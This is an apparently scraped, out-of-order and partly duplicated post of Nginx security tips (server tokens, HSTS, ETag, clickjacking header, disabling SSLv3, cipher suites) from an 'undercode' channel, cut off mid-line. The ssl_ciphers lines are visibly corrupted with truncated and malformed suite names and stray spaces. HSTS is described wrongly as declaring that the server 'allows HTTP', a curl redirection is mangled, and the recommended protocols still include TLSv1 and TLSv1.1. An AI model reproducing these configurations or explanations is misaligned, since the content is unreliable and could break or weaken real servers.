While 2/3 of the web servers on the Internet accept and use this protocol, the community was in a panic.
Admittedly, the exploit is not easy, but if we combine with an attack that lowers the level of cryptography (like Logjam, see below), then all versions of TLS can be affected.
The best way to protect yourself is to disable SSLv3.
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
Testing the configuration
echo -n | openssl s_client -connect mywebserver.domain.net:443 -ssl3
2) Encryption algorithms
Encryption algorithms are divided into 4 types:
- Key exchange
- Authentication
- Block encryption
- Message authentication
Some algorithms (RC4, DH, 3DES, EXP, etc.) should be avoided and others should be given priority.
# Best ratio Security / Accessibility
ssl_ciphers CDHE-RSA-AES128-GCM-SHA256: ECDHE-ECDSA-AES128-GCM-SHA256: ECDHE-RSA-AES256-GCM-SHA384: ECDHE-ECDSA-AES256-GCM-SHA384: DHE-RSA256 : DHE-DSS-AES128-GCM-SHA256: kEDH + AESGCM: ECDHE-RSA-AES128-SHA256: ECDHE-ECDSA-AES128-SHA256: ECDHE-RSA-AES128-SHA: ECDHE-ECDHE-AES12 -AES256-SHA384: ECDHE-ECDSA-AES256-SHA384: ECDHE-RSA-AES256-SHA: ECDHE-ECDSA-AES256-SHA: DHE-RSA-AES128-SHA256: DHE-RSA-AES128-DSSA-DHE -SHA256:! DHE-RSA-AES256-SHA256: DHE-DSS-AES256-SHA:! DHE-RSA-AES256-SHA: AES128-GCM-SHA256:! AES256-GCM-SHA384: AES128-SHA256: !256256-SHA : AES128-SHA:! AES256-SHA: AES: DES-CBC3-SHA:! ANULL:! ENULL:! EXPORT:! DES:! RC4:! MD5:! PSK:! AECDH:! EDH-DSS-DES-CBC3 -SHA:! EDH-RSA-DES-CBC3-SHA:! KRB5-DES-CBC3-SHA;
# Secure
ssl_ciphers EECDH + AESGCM: EDH + AESGCM: AES256 + EECDH: AES256 + EDH;
# Global
ssl_ciphers EECDH + AESGCM: EDH + AESGCM: AES256 + EECDH: ECDHE-RSA-AES128-SHA: DHE-RSA-
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑🌐Some Nginx security configuration tips by undercode:
1) Basic security setup
The best way to protect your web server is to provide the attacker with a minimum of data: version number of Nginx, PHP, OS, etc.
Typically, information is hidden in HTTP headers.
# Only return Nginx in server header
server_tokens off ;
Testing
# Display title
curl https://mywebserver.domain.net/ -ksv 2> & 1> / dev / null | grep Server
2) Strict Transport Security (HSTS)
This setting allows you to declare to the HTTP client that your web server allows HTTP.
The HSTS policy protects users from eavesdropping attacks.
A man-in-the-middle attack cannot intercept the request while the HSTS is active.
add_header Strict-Transport-Security "max-age = 15552001; includeSubdomains; preload";
3) Other means of protection
# Server passes inodes through blocked ETag
etag off;
more_clear_headers 'ETag';
🦑 Anti-clickjacking :
add_header X-Frame-Options "SAMEORIGIN";
1) SSL and TLS encryption protocols
When we talk about SSL, it is actually SSL / TLS.
You should be aware that SSL has been deprecated since 1999 and its latest version, SSLv3, dates from 1996.
Since then, TLS has come into play and three versions have been released: TLSv1.0, TLSv1.1, and TLSv1.2.
Google claims that as of October 14, 2014, it can decrypt messages using SSLv3 through the POODLE attack.
While 2/3 of the web servers on the Internet accept and use this protocol, the community was in a panic.
Admittedly, the exploit is not easy, but if we combine with an attack that lowers the level of cryptography (like Logjam, see below), then all versions of TLS can be affected.
The best way to protect yourself is to disable SSLv3.
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
Testing the configuration
echo -n | openssl s_client -connect mywebserver.domain.net:443 -ssl3
2) Encryption algorithms
Encryption algorithms are divided into 4 types:
- Key exchange
- Authentication
- Block encryption
- Message authentication
Some algorithms (RC4, DH, 3DES, EXP, etc.) should be avoided and others should be given priority.
# Best ratio Security / Accessibility
ssl_ciphers CDHE-RSA-AES128-GCM-SHA256: ECDHE-ECDSA-AES128-GCM-SHA256: ECDHE-RSA-AES256-GCM-SHA384: ECDHE-ECDSA-AES256-GCM-SHA384: DHE-RSA256 : DHE-DSS-AES128-GCM-SHA256: kEDH + AESGCM: ECDHE-RSA-AES128-SHA256: ECDHE-ECDSA-AES128-SHA256: ECDHE-RSA-AES128-SHA: ECDHE-ECDHE-AES12 -AES256-SHA384: ECDHE-ECDSA-AES256-SHA384: ECDHE-RSA-AES256-SHA: ECDHE-ECDSA-AES256-SHA: DHE-RSA-AES128-SHA256: DHE-RSA-AES128-DSSA-DHE -SHA256:! DHE-RSA-AES256-SHA256: DHE-DSS-AES256-SHA:! DHE-RSA-AES256-SHA: AES128-GCM-SHA256:! AES256-GCM-SHA384: AES128-SHA256: !256256-SHA : AES128-SHA:! AES256-SHA: AES: DES-CBC3-SHA:! ANULL:! ENULL:! EXPORT:! DES:! RC4:! MD5:! PSK:! AECDH:! EDH-DSS-DES-CBC3 -SHA:! EDH-RSA-DES-CBC3-SHA:! KRB5-DES-CBC3-SHA;
# Secure
ssl_ciphers EECDH + AESGCM: EDH + AESGCM: AES256 + EECDH: AES256 + EDH;
# Global
ssl_ciphers EECDH + AESGCM: EDH + AESGCM: AES256 + EECDH: ECDHE-RSA-AES128-SHA: DHE-RSA-
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁